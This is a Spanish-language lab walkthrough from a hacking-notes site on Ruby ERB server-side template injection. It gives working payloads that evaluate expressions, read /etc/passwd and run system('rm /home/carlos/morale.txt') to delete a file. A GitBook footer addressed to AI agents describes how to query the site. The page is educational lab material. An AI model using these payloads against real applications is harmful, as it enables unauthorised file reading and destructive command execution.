> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/ssti/basic-ruby-server-side-template-injection.md).

# Inyección básica de plantillas del lado del servidor en Ruby

### Inyección básica de plantillas del lado del servidor

La aplicación utiliza plantillas ERB sin protección, lo que la hace vulnerable a una **Inyección de plantillas del lado del servidor (SSTI)**./ El objetivo es ejecutar código arbitrario para **eliminar archivo** `morale.txt` ubicado en el directorio personal de Carlos\:/ `/home/carlos/morale.txt`.

#### 1. Identificación del parámetro vulnerable

Encontramos un `mensaje` parámetro en la aplicación que **refleja nuestra entrada** directamente en la página. / Este campo se utilizará para inyectar código ERB.

<figure><img src="/files/007f17d82851bbec3f3a6abff609e2378a2dd468" alt=""><figcaption></figcaption></figure>

#### 2. Comprobar la ejecución de código (prueba con 7/\*7)

Se inyecta una expresión Ruby simple para confirmar la SSTI:

```ruby
<%= 7*7 %>
```

Si la vulnerabilidad está presente, la salida mostrará:

<figure><img src="/files/151aff3eb80c227e70887b7cf891dda76d636043" alt="" width="563"><figcaption></figcaption></figure>

Esto demuestra que la expresión Ruby se evalúa en la plantilla del lado del servidor.

#### 3. Leer un archivo sensible: `/etc/passwd`

Una vez confirmada la ejecución, intenta leer un archivo del sistema para validar el acceso al sistema de archivos:

```ruby
<%= File.open('/etc/passwd').read %>
```

<figure><img src="/files/6027c52c6fdcdead94a2e077cf0a4af5d7c0fcdf" alt=""><figcaption></figcaption></figure>

El contenido de `/etc/passwd` se devuelve entonces en la respuesta, confirmando que puedes leer archivos en el servidor.

#### 4. Eliminar a Carlos `morale.txt` Archivo

Para finalizar el laboratorio, ejecuta un comando del sistema para eliminar el archivo solicitado:

```ruby
<%= system('rm /home/carlos/morale.txt') %>
```

Esta inyección inicia el `rm` comando del lado del servidor y elimina el `morale.txt` archivo en el `/home/carlos/` directorio.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/ssti/basic-ruby-server-side-template-injection.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
